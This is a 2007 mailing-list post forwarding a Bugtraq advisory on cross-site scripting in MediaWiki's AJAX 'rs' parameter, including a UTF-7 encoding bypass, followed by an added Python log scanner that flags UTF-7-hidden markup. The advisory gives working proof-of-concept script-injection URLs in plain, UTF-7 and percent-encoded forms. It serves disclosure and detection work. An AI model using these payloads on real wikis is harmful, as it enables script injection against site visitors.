[VIM] [unsure] MediaWiki Cross-site Scripting
Noam Rathaus
noamr at beyondsecurity.com
Tue Feb 20 13:30:23 EST 2007
Anyone able to confirm this? I can't.
---------- Forwarded Message ----------
Subject: MediaWiki Cross-site Scripting
Date: Tuesday 20 February 2007 06:29
From: eyal at bugsec.com
To: bugtraq at securityfocus.com
MediaWiki Cross-site Scripting
Vulnerabilities.
Date:
18/02/2007
Vendor:
MediaWiki
Vulnerable versions:
MediaWiki 1.9.2 (latest) and below.
Description:
MediaWiki v1.8.2 and below are vulnerable to a plain Cross-site scripting
attack by exploiting the experimental AJAX features, if enabled (default).
This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1,
1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. Note:
browsers' encoding auto-detection has to be enabled for successful
exploitation.
Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
UTF-7 XSS in post 1.8.2 versions.
Examples:
v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E
v1.8.3 - v1.9.2:
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D (URL Encoded)
Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24
-------------------------------------------------------
--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
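
Added example, not part of the original post and not MediaWiki code: a Python check for access logs that flags request parameters whose value hides `<`, `>` or quote characters inside UTF-7 shifted runs such as `+ADw-`, the encoding the forwarded advisory describes. The host `wiki.example`, the `exampleFunc` value and all sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# A UTF-7 shifted run: '+', modified-base64 characters, optional '-' terminator.
UTF7_RUN = re.compile(r"\+[A-Za-z0-9+/]+-?")
MARKUP = set("<>\"'")

def utf7_hidden_markup(value):
    """Return markup characters that appear only after UTF-7 decoding."""
    found = set()
    for run in UTF7_RUN.findall(value):
        try:
            decoded = run.encode("ascii").decode("utf-7")
        except UnicodeError:
            continue  # not a valid shifted run, e.g. the "++" in "C++"
        found |= MARKUP & set(decoded)
    return found

def scan_request(url):
    """Map parameter name -> sorted hidden markup characters for one request URL."""
    hits = {}
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        for _ in range(3):  # peel nested percent-encoding
            decoded = unquote(value)  # unquote keeps a literal '+', unlike unquote_plus
            if decoded == value:
                break
            value = decoded
        hidden = utf7_hidden_markup(value)
        if hidden:
            hits[unquote(name)] = sorted(hidden)
    return hits

# Constructed sample requests (hypothetical host, harmless <b> tag as the encoded value).
SAMPLES = [
    "http://wiki.example/wiki/index.php?action=ajax&rs=exampleFunc&rsargs=C++",
    "http://wiki.example/wiki/index.php?action=ajax&rs=+ADw-b+AD4-",
    "http://wiki.example/wiki/index.php?action=ajax&rs=%2B%41%44%77%2Db%2B%41%44%34%2D",
    "http://wiki.example/wiki/index.php?action=ajax&rs=%252BADw-b%252BAD4-",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(scan_request(url) or "clean", url)
```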